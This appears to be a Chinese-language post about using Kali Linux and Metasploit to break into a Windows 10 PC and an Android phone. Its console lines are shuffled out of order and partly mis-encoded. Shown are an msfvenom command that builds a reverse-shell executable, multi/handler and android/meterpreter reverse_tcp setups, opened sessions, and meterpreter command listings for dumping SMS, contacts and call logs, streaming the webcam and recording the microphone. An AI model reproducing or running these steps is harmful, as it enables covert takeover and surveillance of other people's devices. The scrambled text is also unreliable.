kali2.0下入侵windows 10和android手机实战

[*] Starting the payload handler…

get_timeouts Get the current session timeout values

? Help menu

sleep Force Meterpreter to go quiet, then re-establish session.

check_root Check if device is rooted


Stdapi: Networking Commands


meterpreter > help



use exploit/multi/handler

read Reads data from a channel

Stdapi: System Commands

Android Commands

Name Current Setting Required Description

irb Drop into irb scripting mode

Stdapi: File system Commands

set LPORT 3333

geolocate Get current lat-long using geolocation

mkdir Make directory

disable_unicode_encoding Disables encoding of unicode strings

——- ———–


ifconfig Display interfaces

Command Description

EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)

dump_sms Get sms messages

help Help menu


LPORT 4444 yes The listen port

Module options (exploit/multi/handler):

——- ———–

channel Displays information or control active channels

meterpreter > webcam_stream

background Backgrounds the current session

dump_calllog Get call log

[*] Starting the payload handler…

—- ————— ——– ———–

load Load one or more meterpreter extensions

——- ———–

write Writes data to a channel

webcam_list List webcams

run Executes a meterpreter script or Post module

send_sms Sends SMS from target session

pwd Print working directory

Core Commands

rm Delete the specified file

getwd Print working directory

(c) 2015 Microsoft Corporation����������Ȩ����


edit Edit a file

set payload windows/x64/shell/reverse_tcp

Command Description

upload Upload a file or directory

^C[-] Exploit failed: Interrupt

——- ———–

webcam_stream Play a video stream from the specified webcam

set_timeouts Set the current session timeout values

cat Read the contents of a file to the screen

resource Run the commands stored in a file

ls List files

Stdapi: Webcam Commands


record_mic Record audio from the default microphone for X seconds

[*] Started reverse TCP handler on

machine_id Get the MSF ID of the machine attached to the session

root@kali:~# service postgresql start

shell Drop into a system command shell

LPORT => 8888

[*] Preparing player…

[*] Starting the payload handler…

Name Current Setting Required Description


msf exploit(handler) > set LPORT 8888

dir List files (alias for ls)

msf exploit(handler) > exploit

[*] Opening player at: kxQmnwHE.html

Command Description

Payload options (windows/x64/shell/reverse_tcp):

webcam_snap Take a snapshot from the specified webcam

Microsoft Windows [�汾 10.0.10586]

root@kali:~# msfconsole

cd Change directory


uuid Get the UUID for the current session

close Closes a channel

interval_collect Manage interval collection capabilities

info Displays information about a Post module

——- ———–



[*] Starting…

download Download a file or directory

use exploit/multi/handler

lpwd Print local working directory

quit Terminate the meterpreter session

[*] Exploit completed, but no session was created.

LHOST yes The listen address


execute Execute a command

[*] Device is not rooted

——- ———–

sysinfo Gets information about the remote system, such as OS

Command Description

msfvenom –platform windows -p windows/x64/shell/reverse_tcp LHOST= LPORT=3333 EXITFUNC=thread -b ‘\x00’ -f exe-only -o /root/Desktop/shell1.exe

meterpreter > sessions -I

transport Change the current transport mechanism

bgrun Executes a meterpreter script as a background thread


show options

search Search for files

—- ————— ——– ———–

meterpreter > check_root

route View and modify the routing table

[*] Started reverse TCP handler on

[*] Meterpreter session 1 opened ( -> at 2016-06-16 23:11:36 -0400

use Deprecated alias for ‘load’


ps List running processes

bgkill Kills a background meterpreter script

[*] Sending stage (60790 bytes) to

webcam_chat Start a video chat



getuid Get the user that the server is running as

ipconfig Display interfaces



[*] Sending stage (336 bytes) to



enable_unicode_encoding Enables encoding of unicode strings

set PAYLOAD android/meterpreter/reverse_tcp

show options

rmdir Remove directory

bglist Lists running background scripts

Command Description

lcd Change local working directory

getlwd Print local working directory

wlan_geolocate Get current lat-long using WLAN information

[*] Streaming…

dump_contacts Get contacts list

Command Description

[*] Command shell session 1 opened ( -> at 2016-06-16 20:59:00 -0400

[*] Started reverse TCP handler on

portfwd Forward a local port to a remote service

exit Terminate the meterpreter session